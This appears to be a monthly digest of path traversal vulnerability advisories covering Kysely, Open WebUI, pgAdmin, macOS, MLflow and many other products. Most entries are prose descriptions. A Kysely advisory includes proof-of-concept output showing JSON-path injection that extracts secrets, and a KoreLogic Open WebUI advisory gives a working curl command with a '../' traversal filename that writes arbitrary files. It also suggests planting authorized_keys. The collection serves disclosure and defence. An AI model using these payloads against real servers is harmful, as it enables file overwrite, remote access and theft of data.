Path Traversal
Monthly
efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the elfinder_checkRisk function validates target and targets for path traversal and home containment, but does not validate the dst (destination) parameter used by elfinder_paste. An attacker can copy or move files from within the home directory to any arbitrary destination by setting dst to a base64-encoded traversal path. This bypasses the protected=true security control. This vulnerability is fixed in 4.08.010.
Pulpy is a lightweight, cross-platform desktop application packager for web apps. Prior to 0.1.1, Pulpy injects a pulpy.fs JavaScript API into every packaged web application, giving it access to the host filesystem. A validateFsPath() function is supposed to sandbox this access, but its blocklist is incomplete. Any web app packaged with Pulpy can read and write arbitrary files in the user's home directory - including ~/.ssh/id_rsa, ~/.aws/credentials, and ~/Library/Keychains/. This vulnerability is fixed in 0.1.1.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in arbitrary file system read and write. An authenticated attacker with administrative privileges could exploit this vulnerability to read or write files outside the restricted directory. Exploitation of this issue does not require user interaction. Scope is changed.
HashiCorp Nomad and Nomad Enterprise prior to 2.0.1 are vulnerable to code execution on the client host through a path traversal attack. This vulnerability (CVE-2026-7474) is fixed in Nomad 2.0.1, 1.11.5 and 1.10.11.
Substance3D - Designer versions 15.1.0 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.
Files or directories accessible to external parties in Microsoft Teams allows an unauthorized attacker to perform spoofing locally.
Relative path traversal in Visual Studio Code allows an unauthorized attacker to disclose information locally.
Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (“Path Traversal”) vulnerability that could cause unauthorized access to sensitive files when user-supplied input is improperly handled during server-side file path processing.
Remote path traversal in Siemens ROS# versions prior to V2.2.2 enables unauthenticated attackers to read arbitrary files from affected systems due to insufficient input sanitization. The vulnerability affects the ROS# library, a C# .NET implementation for Robot Operating System communication, with CVSS 9.3 critical severity. No active exploitation or public exploit code has been identified at time of analysis, though the network-accessible attack vector and lack of authentication requirements present significant risk for robotics systems using this library.
Privilege escalation in Axis OS via path traversal in ACAP configuration files allows high-privileged local attackers to achieve code execution with elevated permissions. The vulnerability requires the device to be configured for unsigned ACAP application installation and the attacker to socially engineer a user into installing a malicious ACAP application. CVSS 6.7 reflects high confidentiality, integrity, and availability impact, but exploitation is constrained by high-privilege requirement and user interaction. No public exploit code or active exploitation has been identified at time of analysis.
Path traversal vulnerability in Lhaz and Lhaz+ archive extraction allows local users to write files to unintended directories when the automatic folder creation feature is enabled and a crafted archive is extracted. The vulnerability requires user interaction (extracting a malicious archive) and affects only the integrity of file placement, not confidentiality or availability. CVSS score is 3.3 (low); no public exploit code or active exploitation has been identified.
Remote unauthenticated attackers can delete arbitrary ElasticSearch documents and MinIO storage files in nexent v1.7.5.2 via the unprotected DELETE /{index_name}/documents endpoint. The backend service fails to authenticate requests or validate the path_or_url parameter, enabling mass data destruction and denial of service. EPSS probability (0.12%) indicates low predicted exploitation likelihood, and no active exploitation or public exploit code has been identified at time of analysis, though the CVSS 9.1 reflects the severe impact of unauthenticated remote data deletion.
Unauthenticated remote attackers can delete arbitrary files from nexent v1.7.5.2's MinIO storage backend via an unprotected DELETE endpoint, leading to data loss and denial of service. The /storage/{object_name:path} API lacks authentication, authorization, and input validation (CWE-552). CVSS 9.1 reflects critical severity, though EPSS score of 0.08% (23rd percentile) and SSVC 'exploitation: none' indicate no observed active exploitation or public exploit code at time of analysis. SSVC marks this as 'automatable: yes' with 'technical impact: partial', suggesting straightforward exploitation once discovered but limited scope beyond data integrity/availability impacts.
jotty·page is a self-hosted app for your checklists and notes. Prior to 1.22.0, an unauthenticated path traversal vulnerability exists in /api/app-icons/[filename]. The filename route parameter is joined into a filesystem path without traversal/boundary validation, allowing file reads outside data/uploads/app-icons/. This vulnerability is fixed in 1.22.0.
Outline is a service that allows for collaborative documentation. Prior to 1.7.0, ZipHelper.extract computes the extraction path for each entry by passing a full filesystem path through trimFileAndExt, a filename helper that calls path.basename on its input when truncating. When a zip entry's nested path is long enough to push the joined filesystem path over MAX_PATH_LENGTH (4096 bytes), trimFileAndExt silently drops all directory components and returns a bare filename. fs.createWriteStream then opens the file relative to the process working directory instead of inside the extraction sandbox, and the escaped file persists after import cleanup because cleanupExtractedData only removes the temporary extraction directory. This vulnerability is fixed in 1.7.0.
Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the podcast creation endpoint at server/controllers/PodcastController.js accepts a user-controlled file path without sufficient boundary validation to ensure it remains within the intended library directory. This vulnerability is fixed in 2.32.2.
Information disclosure in macOS allows malicious applications to read unprotected user data through a path handling vulnerability. Affects macOS Sequoia (prior to 15.7.7), Sonoma (prior to 14.8.7), and Tahoe (prior to 26.5). The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears misaligned with the vendor description indicating local app-based exploitation, requiring verification. Despite high CVSS 7.5, EPSS of 0.02% (4th percentile) suggests minimal observed exploitation activity. No public exploit code or CISA KEV listing identified at time of analysis.
Local privilege escalation in Apple macOS (Sequoia, Sonoma, and Tahoe branches) allows a malicious application to gain root privileges by exploiting a path validation flaw in directory path handling. The issue, tracked as CVE-2026-28915 and reported by Apple itself, has no public exploit identified at time of analysis and a very low EPSS score (0.02%), but the total technical impact (root) makes it a meaningful endpoint hardening priority.
Authenticated users with upload permission in Audiobookshelf prior to 2.32.2 can enumerate files outside their authorized library folder through a path traversal vulnerability in the POST /api/filesystem/pathexists endpoint. The vulnerability exploits a weak String.startsWith() validation that fails to distinguish between sibling directories with shared prefixes (e.g., /audiobooks and /audiobooks-private), allowing information disclosure about file existence across library boundaries despite authentication requirements. No public exploit code or active exploitation has been identified at time of analysis.
## Summary Kysely 0.28.12 added a `sanitizeStringLiteral()` call inside `DefaultQueryCompiler.visitJSONPathLeg` (commit `0a602bf`, PR #1727) to fix CVE-2026-32763 (`GHSA-wmrf-hv6w-mr66`). The fix only doubles single quotes (`'` → `''`); it does **not** escape JSON-path metacharacters (`.`, `[`, `]`, `*`, `**`, `?`). When attacker-controlled input flows into `eb.ref(col, '->$').key(input)` or `.at(input)` - including type-safe code where the JSON column is shaped like `Record<string, T>` so `K extends string` is the inferred type - every dot becomes a path-leg separator, letting an attacker traverse from the intended key into sibling and child fields the developer never meant to expose. The result is read access (and, in update statements, write access) to JSON sub-fields outside the intended scope across MySQL, PostgreSQL `->$`/`->>$`, and SQLite. * Project: Kysely - TypeScript SQL query builder (npm `kysely`); affects MySQL, PostgreSQL `->$`/`->>$`, and SQLite dialects. * Source reviewed: `kysely-org/kysely` @ `master` (`73192e4`, version `0.28.16`). * Deployed artefact validated: `kysely@0.28.16` from npm. * Affected file(s): * `src/query-compiler/default-query-compiler.ts` (lines 1611-1639, 1821-1823) * `src/query-builder/json-path-builder.ts` (lines 93-196) * `src/dialect/mysql/mysql-query-compiler.ts` (overrides `sanitizeStringLiteral` but inherits the same behaviour for path legs - escapes `\` and `'`, nothing else) * CWE: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command, with CWE-915 / CWE-1284 (improper validation of specified quantity in input) flavours for the JSON-path sub-language. * OWASP 2021: A03:2021 - Injection. ## Vulnerable code `src/query-compiler/default-query-compiler.ts:1625-1639`: ```ts protected override visitJSONPathLeg(node: JSONPathLegNode): void { const isArrayLocation = node.type === 'ArrayLocation' this.append(isArrayLocation ? '[' : '.') // (1) this.append( typeof node.value === 'string' ? this.sanitizeStringLiteral(node.value) // (2) : String(node.value), ) if (isArrayLocation) { this.append(']') } } ``` `src/query-compiler/default-query-compiler.ts:1821-1823`: ```ts protected sanitizeStringLiteral(value: string): string { return value.replace(LIT_WRAP_REGEX, "''") // (3) } ``` with `LIT_WRAP_REGEX = /'/g`. `src/query-builder/json-path-builder.ts:151-167`: ```ts key< K extends any[] extends O ? never : O extends object ? keyof NonNullable<O> & string : never, O2 = undefined extends O ? null | NonNullable<NonNullable<O>[K]> : null extends O ? null | NonNullable<NonNullable<O>[K]> : // when the object has non-specific keys, e.g. Record<string, T>, should infer `T | null`! string extends keyof NonNullable<O> ? null | NonNullable<NonNullable<O>[K]> : NonNullable<O>[K], >(key: K): TraversedJSONPathBuilder<S, O2> { return this.#createBuilderWithPathLeg('Member', key) // (4) } ``` `src/query-builder/json-path-builder.ts:169-196`: ```ts #createBuilderWithPathLeg( legType: JSONPathLegType, value: string | number, // (5) ): TraversedJSONPathBuilder<any, any> { // ... return new TraversedJSONPathBuilder( JSONPathNode.cloneWithLeg( this.#node, JSONPathLegNode.create(legType, value), // (6) ), ) } ``` At (1) the compiler emits the path-leg separator - `.` for member access or `[` for array index. At (2) the user-supplied string is run through `sanitizeStringLiteral`, which at (3) only doubles single quotes (`'`). Dots, brackets, asterisks, double-asterisks and question marks - every reserved character of the SQL/JSON path mini-language - pass through unmodified. At (4) `.key(K)` types `K` as `keyof NonNullable<O> & string`. When the JSON column is typed as `Record<string, T>` (a common shape for free-form metadata blobs) the inferred `K` is just `string`, so attacker-controlled input is **type-safe** and does not need a `Kysely<any>` escape hatch - this finding is *broader* than `GHSA-wmrf-hv6w-mr66` (CVE-2026-32763), which only covered the `Kysely<any>` case. At (5)/(6) the runtime accepts any `string | number` regardless of `legType`, so a string sent into `.at(...)` (`'last'`/`'#-N'` per the public type signature) also reaches the same emitter and can carry `]` to break out of the bracket. The fix at `0a602bf` only addressed the single-quote → string-literal escape. The JSON-path metacharacter set was overlooked. `MysqlQueryCompiler.sanitizeStringLiteral` (`src/dialect/mysql/mysql-query-compiler.ts:47-51`) overrides the helper to also escape backslashes - but again, it does nothing for `. [ ] * ** ?`. ## Reproduction (validated locally) Environment: `kysely@0.28.16` + `better-sqlite3@12.x`, Node 22, on macOS. The PoC harness lives in `/Users/admin/joplin_research/kysely-poc/`. ### Step 1 - Compiled-SQL evidence across all three dialects `/Users/admin/joplin_research/kysely-poc/poc.mjs` (no DB, just `.compile()`): ```bash $ node poc.mjs ===== MySQL ===== --- baseline: .key("nick") --- SQL: select `profile`->'$.nick' as `out` from `person` --- INJECTION via .key(ATTACKER) -- "nick.secret_field" --- SQL: select `profile`->'$.nick.secret_field' as `out` from `person` --- INJECTION via .key("*") -- wildcard reaches all keys --- SQL: select `profile`->'$.*' as `out` from `person` --- INJECTION via .at(ATTACKER3) -- bracket escape --- SQL: select `profile`->'$[].secret]' as `out` from `person` ===== PostgreSQL (->$ uses jsonpath, MySQL-like) ===== --- baseline: .key("nick") --- SQL: select "profile"->'$.nick' as "out" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->'$.nick.secret_field' as "out" from "person" ===== SQLite ===== --- baseline: .key("nick") --- SQL: select "profile"->>'$.nick' as "value" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->>'$.nick.secret_field' as "out" from "person" --- INJECTION via .key("*") --- SQL: select "profile"->>'$.*' as "out" from "person" ``` The compiled SQL clearly shows the dot inside the user-supplied "key" being interpreted by the database as a path separator: `'$.nick'` (one leg) becomes `'$.nick.secret_field'` (two legs). MySQL additionally accepts `*` as a wildcard reaching every member at the current level. ### Step 2 - End-to-end data disclosure on a real database `/Users/admin/joplin_research/kysely-poc/sqlite-runtime.mjs` simulates a typical handler that reads one top-level field of the caller's profile: ```js async function fetchProfileField(userInput) { return db.selectFrom('me') .select(eb => eb.ref('profile', '->>$').key(userInput).as('value')) .where('id', '=', 1) .execute() } ``` The `me.profile` JSON column for user 1 is: ```json { "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } } ``` The developer's intent: only top-level keys (`nick`, `tagline`) are ever requested. `internal` is private bookkeeping. ```bash $ node sqlite-runtime.mjs ===== Legitimate request ===== userInput = "nick" compiled SQL: select "profile"->>'$.nick' as "value" from "me" where "id" = ? result: [ { value: 'alice' } ] ===== Injection: dot lets attacker reach nested "internal" object ===== userInput = "internal.ssn" compiled SQL: select "profile"->>'$.internal.ssn' as "value" from "me" where "id" = ? result: [ { value: '111-11-1111' } ] userInput = "internal.token" compiled SQL: select "profile"->>'$.internal.token' as "value" from "me" where "id" = ? result: [ { value: 'tok_abcdef' } ] userInput = "internal.admin" compiled SQL: select "profile"->>'$.internal.admin' as "value" from "me" where "id" = ? result: [ { value: 1 } ] ``` Expected vs. actual: the application invariant was "the user can only read top-level keys of their profile". The output violates that invariant - `internal.ssn`, `internal.token`, and `internal.admin` are returned even though `internal` was never meant to be addressable through this endpoint. The same pattern is exploitable on MySQL (where `*` and `**` wildcards make it strictly worse - a single `*` enumerates every sibling at the current level in one row) and on PostgreSQL when using the `->$`/`->>$` operators (which target MySQL-style JSON-path strings on PG ≥ 17 / via `jsonb_path_query`). ## Impact * **Authorization bypass on JSON sub-fields.** Any kysely-built query whose JSON-path key/index argument is partially or fully attacker-controlled - even in fully type-safe code where the column type is `Record<string, T>` - leaks data the developer believed was scoped behind the explicitly-listed key. SSNs, tokens, admin flags, internal IDs, anything stored as a nested member of the same JSON document is reachable. * **Wildcard reads on MySQL / PostgreSQL `->$`.** `key('*')` compiles to `'$.*'`, returning the array of every value at the current depth in one round-trip. `key('**')` recurses across the whole document. The fix does not strip either token. * **Write access in update statements.** Kysely uses the same path compiler for `update().set(eb => eb.ref(col, '->$').key(input), value)`-style writes (and `jsonb_set` helpers). An attacker who can drive both the path and the value can therefore write into nested fields they should not be able to set - for example flipping an `admin` flag or rewriting a nested role. * **Bypasses the recently-fixed precedent.** The maintainers shipped commit `0a602bf` (PR #1727) specifically to harden this surface. That fix removed the `'` (quote) primitive but left every JSON-path metacharacter alone, so the surface is still open against any caller that *thought* it was now safe. * **Practical bounding.** The attacker needs a code path where a request-derived string lands in `.key(...)` or `.at(...)`. This is a recognised pattern (filter-by-field, dynamic `select` for admin dashboards, Strapi-style JSON-blob columns); it is not a default kysely behaviour but is plausibly common. The vulnerable path is also exercised any time a developer writes `db as Kysely<any>` (covered by the older `GHSA-wmrf-hv6w-mr66` advisory) - but unlike that advisory, the bug here triggers in fully-typed code on `Record<string, T>` columns. ## Suggested fix Treat path legs as a structured emission, not a string-literal escape. The narrowest safe patch is a dedicated `sanitizeJSONPathLeg` that only emits a known-good character set per leg type and rejects everything else, since JSON-path quoting differs by dialect (MySQL allows `"…"`-quoted member names; SQLite is more permissive but still has a grammar; PostgreSQL `jsonpath` is strict). ```ts // src/query-compiler/default-query-compiler.ts const JSON_PATH_MEMBER_OK = /^[A-Za-z_$][A-Za-z0-9_$]*$/ protected override visitJSONPathLeg(node: JSONPathLegNode): void { if (node.type === 'ArrayLocation') { this.append('[') if (typeof node.value === 'number') { this.append(String(node.value | 0)) // int-coerce } else if (node.value === 'last' || /^#-\d+$/.test(node.value)) { this.append(node.value) // documented dialect tokens } else { throw new Error(`invalid JSON array index: ${node.value}`) } this.append(']') return } // Member this.append('.') if (typeof node.value !== 'string' || !JSON_PATH_MEMBER_OK.test(node.value)) { // Per-dialect quoted-member escape would go here; default = reject. throw new Error(`invalid JSON path member: ${JSON.stringify(node.value)}`) } this.append(node.value) } ``` For dialect-specific behaviour (MySQL `"…"`-quoted members, SQLite bracket-quoted), each dialect compiler should override the helper and apply the appropriate quoting + double-the-quote rule, the same way `sanitizeIdentifier` already does. Consider also: parameterise JSON paths whenever the dialect supports it (PostgreSQL `jsonb_path_query($1, $2)`, MySQL `JSON_EXTRACT(?, ?)`), so attacker-controlled keys are bound, not concatenated. Add a regression test to `test/node/src/json-traversal.test.ts` asserting that `eb.ref('c','->$').key('a.b').compile().sql` is **either** rejected, **or** emits MySQL `'$."a.b"'` / SQLite `'$.["a.b"]'` (quoted-member form), and explicitly differs from `key('a').key('b')`. A backstop hardening: tighten the `.at()` runtime to accept only `number | 'last' | '#-${digits}'` (matching the type signature), and tighten `.key()` to only accept strings that match `keyof O` at runtime when `O` is statically known.
Remote unauthenticated attackers can read arbitrary files from MLflow server filesystems in versions 3.9.0 and earlier. By submitting a CreateModelVersion request with the tag 'mlflow.prompt.is_prompt' and an arbitrary local filesystem path as the source, attackers bypass validation logic. The get_model_version_artifact_handler() function later serves files from that path without checking prompt status, enabling full confidentiality breach. Fixed in version 3.10.0 per commit 6e801f4 which blocks file:// URIs and absolute paths for prompt sources. CVSS 7.5 (High) reflects network attack vector with no authentication or user interaction required.
Tookie is a advanced OSINT information gathering tool. Prior to 4.1fix, modules/modules.py's write_txt, write_csv, write_json, and (commented-but-shipping) scan_file helpers open their output as open(f"{user}.<ext>"), where user comes unsanitized from the -u CLI flag or any line of a -U usernames file. A username that contains path-separator sequences (.., /, \, or an absolute path) causes tookie-osint to write the scan output to an arbitrary path the invoking user has write permission for. This vulnerability is fixed in 4.1fix.
Path traversal in Crabbox <0.9.0 allows local attackers to delete or overwrite arbitrary files via malicious .crabbox.yaml configuration. When a user executes Crabbox commands with a crafted workspace configuration containing directory traversal sequences (e.g., '../../../'), the Islo provider performs rm -rf and mkdir -p on attacker-controlled paths outside /workspace. Patch available in v0.9.0 (commit 6b07193). No KEV listing or public POC identified, but exploitation requires only user interaction (opening/running a malicious project), not authentication or special privileges.
OpenClaw before version 2026.4.15 allows arbitrary local file read via the webchat audio embedding helper, which fails to enforce local media root containment checks. Attackers who can influence agent or tool-produced ReplyPayload.mediaUrl parameters can resolve absolute local paths or file:// URLs, read audio-like files, and embed them base64-encoded into webchat responses. The vulnerability is narrow in scope-files must be readable by the gateway process, have audio-like extensions, and fit within the webchat audio size cap-but crosses the security boundary between model/tool output and host filesystem access. No public exploit code or active exploitation has been identified, though the vulnerability is confirmed by vendor advisory.
Remote code execution in GitHub Copilot CLI versions prior to 1.0.43 allows attackers to execute arbitrary commands via malicious bare git repositories embedded in project directories. When the CLI agent performs routine git operations, git's automatic bare repository discovery triggers execution of commands specified in config keys like core.fsmonitor. Attackers can deliver the malicious repository through pull requests, compromised dependencies, or pre-existing cloned repositories. No public exploit identified at time of analysis, though the attack technique leverages well-documented git behavior. The vendor-released patch (version 1.0.43) sets safe.bareRepository=explicit to block automatic bare repository discovery.
Path traversal in Casdoor's Local File System storage provider allows authenticated administrators to write arbitrary files to the filesystem by bypassing path sanitization in the storage sandbox. An attacker with administrative privileges can exploit insufficient input validation to create or overwrite files anywhere on the host system. EPSS score of 0.03% indicates minimal real-world exploitation probability despite the moderate CVSS 5.9 score, suggesting the vulnerability requires both authenticated access and administrative privileges that significantly limit practical attack surface.
{% include %} and {% render %} Liquid tags. The built-in FileSystemLoader and CachingFileSystemLoader failed to reject absolute paths, escaping the configured search path; no public exploit identified at time of analysis but the vendor advisory (GHSA-8p4x-wr7x-3788) publicly documents the bypass mechanism.
Symbolic link path traversal in pgAdmin 4 File Manager allows authenticated users to write arbitrary files on the server filesystem. Attackers with valid credentials can plant symlinks in their storage directory pointing outside it, bypassing access controls to overwrite critical system files or application configurations with pgAdmin process privileges. The vulnerability combines CWE-61 (symlink following) with a time-of-check-time-of-use race condition. Affects all pgAdmin 4 versions before 9.15. No active exploitation confirmed (not in CISA KEV), but exploit is straightforward for authenticated attackers given the detailed fix description published by PostgreSQL project.
Authenticated users in pgAdmin 4 before version 9.15 can read arbitrary server-side files or trigger server-side request forgery (SSRF) attacks via unvalidated LLM API configuration endpoints. The vulnerabilities exist in the chat and model-list endpoints where user-supplied api_key_file and api_url parameters are passed directly to LLM provider clients without sanitization, enabling attackers to exfiltrate sensitive files (database credentials, private keys) readable by the pgAdmin process or coerce internal requests to cloud metadata services and private infrastructure.
Path traversal in Open WebUI's file upload mechanism allows authenticated attackers to write and subsequently delete arbitrary files on the server filesystem. Discovered by Taylor Pennington of KoreLogic, this vulnerability affects the /ollama/models/upload API endpoint where unsanitized filename parameters enable directory traversal using dot-segments. The vulnerability requires low-privilege authentication (PR:L) and has straightforward exploitation (AC:L), confirmed by a published GitHub security advisory (GHSA-j3fw-wc48-29g3) with working proof-of-concept code. Vendor-released patch available in version 0.6.10. No evidence of active exploitation (not in CISA KEV) at time of analysis.
Remote path traversal in GROWI v7.5.0 and earlier allows authenticated administrators to execute arbitrary EJS templates on the server when an email server is configured. The vulnerability enables template injection through directory traversal, potentially leading to remote code execution. Exploitation requires high privileges (administrator role) and a specific deployment configuration with email server functionality enabled. No active exploitation confirmed in CISA KEV, but CVSS 8.6 reflects the severity of arbitrary code execution impact once prerequisites are met.
Path traversal vulnerability in cramfs-tools up to version 2.1 allows local authenticated users to escape directory restrictions via malformed filenames in the Directory Handler component (do_directory function in cramfsck.c). Publicly available exploit code exists. CVSS score of 1.9 reflects low confidentiality, integrity, and availability impact combined with local-only attack vector and required low privilege level; however, the vulnerability enables directory traversal that could facilitate unauthorized file access or modification on systems where cramfs-tools processes untrusted filesystem images.
docuFORM Managed Print Service Client 11.11c is vulnerable to a directory traversal allowing attackers to read arbitrary files via crafted url.
WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin cab-fare-calculator 1.0.3 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the controller parameter in. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Remote path traversal in Industrial Application Software IAS Canias ERP 8.03 allows unauthenticated network attackers to read arbitrary files by manipulating the m_strSourceFileName argument in the iasRequestFileEvent function of the RMI Interface. The vulnerability has been publicly disclosed with proof-of-concept code available, and the vendor has not responded to early disclosure notification.
Denial of service in Gibbon versions before v30.0.01 via path traversal during ZIP file extraction allows authenticated users with Teacher or higher privileges to trigger file deletion and application unavailability. The vulnerability exploits improper handling of malicious ZIP archives, where failed extraction attempts result in unintended deletion of PHP application files. This requires elevated privileges within the application and network access to the vulnerable endpoint.
Path traversal in SharpCompress `WriteToDirectory()` allows malicious ZIP and TAR archives to create directories outside the intended extraction root via relative (`../../`) and absolute path (`/tmp/`) overrides in the directory-entry fast-path. TAR archives can be further escalated to arbitrary file writes when callers implement `SymbolicLinkHandler` without validating symlink targets, enabling an attacker to write files anywhere on the filesystem subject to process permissions. CVSS 5.9 reflects moderate severity; real-world impact depends on whether the application extracts untrusted archives and implements symlink handling.
Path traversal in ViewComponent system test entrypoint allows local attackers to read arbitrary files outside the intended temp directory by exploiting a flawed string-prefix containment check. The vulnerability affects ViewComponent 3.0.0 through 4.8.x running in Rails test mode; a request with a crafted file parameter containing a sibling directory name (e.g., `../view_components_evil/secret.html.erb`) bypasses validation because `/app/tmp/view_components_evil/secret.html.erb` passes a `start_with?` check against `/app/tmp/view_components`. This is limited to test environments (Rails.env.test?) but poses risk in shared CI systems, staging, or review apps where test mode is accidentally exposed. Public proof-of-concept code is available.
# **CONFIDENTIAL** # KL-CAN-2024-002 ## Vulnerability Details | # | Field | Value | |---|-------|-------| | 1 | **Discoverer** | Jaggar Henry & Sean Segreti of KoreLogic, Inc. | | 2 | **Date Submitted** | 2024.03.12 | | 3 | **Title** | Open WebUI Arbitrary File Upload + Path Traversal | | 5 | **Affected Vendor** | Open WebUI | | 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) | | 7 | **Affected Version(s)** | 0.1.105 | | 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) | | 9 | **Vector** | HTTP web interface | | 10 | **CWE** | CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type | --- ## 4. High-level Summary Attacker controlled files can be uploaded to arbitrary locations on the web server's filesystem by abusing a path traversal vulnerability. --- ## 11. Technical Analysis When attaching files to a prompt by clicking the plus sign (+) on the left of the message input box when using the Open WebUI HTTP interface, the file is uploaded to a static upload directory. The name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission. This can be visualized by examining the python code for the `/rag/api/v1/doc` API route: ```python @app.post("/doc") def store_doc( collection_name: Optional[str] = Form(None), file: UploadFile = File(...), user=Depends(get_current_user), ): # "https://www.gutenberg.org/files/1727/1727-h/1727-h.htm" print(file.content_type) try: filename = file.filename file_path = f"{UPLOAD_DIR}/{filename}" contents = file.file.read() with open(file_path, "wb") as f: f.write(contents) f.close() ``` The `file` variable is a representation of the multipart form data contained within the HTTP POST request. The `filename` variable is derived from the uploaded file name and is not validated before writing the file contents to disk. This can be used to upload malicious models. These models are often distributed as pickled python objects and can be leveraged to execute arbitrary python bytecode once deserialized. Alternatively, an attacker can leverage existing services, such as SSH, to upload an attacker controlled `authorized_keys` file to remotely connect to the machine. --- ## 12. Proof-of-Concept Execute the following cURL command: ```bash TARGET_URI='https://redacted.com'; JWT='redacted'; LOCAL_FILE='/tmp/file_to_upload.txt'\ curl -H "Authorization: Bearer $JWT" -F "file=$LOCAL_FILE;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGET_URI/rag/api/v1/doc" ``` Verify the file `pwned.txt` exists in the `/tmp/` directory on the machine hosting the web server: ```console ollama@webserver:~$ cat /tmp/pwned.txt korelogic ollama@webserver:~$ ```
SolidCAM-GPPL-IDE is an unofficial, independently developed extension, Postprocessor IDE for SolidCAM. From version 1.0.0 to before version 1.0.2, the inc "filename" directive in GPPL postprocessor files is resolved by GpplDocumentLinkHandler into a clickable link (VS Code textDocument/documentLink). The handler accepted arbitrary paths - absolute, relative with parent-directory segments (..\..\..\), UNC (\\server\share\), and arbitrary subfolders - and called File.Exists on each to decide whether to render the link. Two distinct attack surfaces resulted: information disclosure via File.Exists probing and NTLM hash leak via UNC path probing. This issue has been patched in version 1.0.2.
Authenticated attackers can read arbitrary JSON files from SmarterMail servers prior to build 9560 through a path traversal vulnerability in the /api/v1/report/summary/{type} endpoint. The vulnerability chains with weak encryption and hardcoded keys to decrypt stored passwords and two-factor authentication secrets for all system users, enabling complete account compromise. VulnCheck identified this vulnerability; vendor patch available in build 9560 or later. CVSS 8.7 reflects high confidentiality and integrity impact with low attack complexity, though requiring authenticated access (PR:L) moderates immediate risk for internet-exposed instances with strong authentication controls.
Path traversal vulnerability in novaGallery prior to version 2.1.1 allows unauthenticated remote attackers to read arbitrary image files outside the intended gallery root directory via crafted album or image parameters. The vulnerability has low real-world impact (confidentiality only, CVSS 5.3) but affects all unpatched installations since exploitation requires no authentication, user interaction, or special configuration. Vendor-released patch version 2.1.1 is available.
Authenticated administrators in Flarum can read arbitrary files and trigger server-side request forgery via LESS injection in theme color settings. The vulnerability exploits an incomplete patch for CVE-2023-27577 that restricted @import and data-uri() only in the custom_less setting but failed to apply the same restrictions to other LESS config variables such as theme_primary_color and theme_secondary_color. An attacker with admin credentials can inject arbitrary @import directives into compiled forum.css, exposing sensitive files or making outbound HTTP requests to internal networks and cloud metadata endpoints. Vendor-released patches: Flarum 1.8.16 and 2.0.0-rc.1.
URL injection via unsanitized path parameters in i18next-locize-backend prior to 9.0.2 allows remote attackers to manipulate translation resource URLs by injecting path traversal sequences, query strings, or fragments through user-controlled lng, ns, projectId, or version parameters. When these values are exposed via query parameters, cookies, or request headers through i18next-browser-languagedetector, an attacker can redirect requests to unintended translation resources or trigger SSRF/arbitrary-file-read attacks against internal/file-scheme URLs. No public exploit code has been identified, but the vulnerability is straightforward to exploit given network-accessible backend services.
Object.prototype pollution in i18next-http-middleware prior to 3.9.3 allows remote unauthenticated attackers to inject arbitrary properties into all JavaScript objects via crafted HTTP requests, bypassing authorization checks, causing type-confusion denial of service, or enabling remote code execution when chained with vulnerable downstream code. The vulnerability is actively exploitable through two unprotected API endpoints (getResourcesHandler and missingKeyHandler) that accept user-controlled language and namespace parameters without validation. EPSS data not provided, not listed in CISA KEV, but publicly disclosed with detailed GitHub security advisory including technical exploitation details.
Path traversal via symlink exploitation in PraisonAI multi-agent teams system allows remote unauthenticated attackers to write arbitrary files outside intended directories during recipe operations (pull/publish/unpack). The _safe_extractall helper validates archive member names but fails to validate symlink targets (linkname attribute), enabling attackers to craft malicious tar bundles containing symlinks pointing outside extraction directories followed by files traversing through those symlinks. Affects versions prior to 4.6.37. EPSS data unavailable, no CISA KEV listing, and no public POC identified at time of analysis, suggesting limited observed exploitation despite network-accessible attack vector.
Path traversal vulnerability in YARD prior to version 0.9.42 allows remote attackers to access arbitrary files on a server running yard server with unsanitized HTTP requests when using the --docroot flag. The vulnerability affects the documentation serving functionality and has been patched in version 0.9.42. No public exploit code or active exploitation has been identified at the time of analysis.
Remote unauthenticated attackers can read arbitrary local files and trigger deletion of targeted files in SEPPmail Secure Email Gateway versions before 15.0.4 through path traversal in the /api.app/attachment/preview endpoint. The vulnerability allows exploitation without authentication or user interaction (CVSS:4.0 AV:N/AC:L/PR:N/UI:N), enabling attackers to exfiltrate sensitive configuration files, credentials, or email data, and selectively delete files with api.app process privileges. No active exploitation confirmed by CISA KEV at time of analysis, though the unauthenticated remote attack vector and file manipulation capabilities represent elevated risk for exposed email gateway appliances. Swiss NCSC disclosure suggests vendor-coordinated remediation.
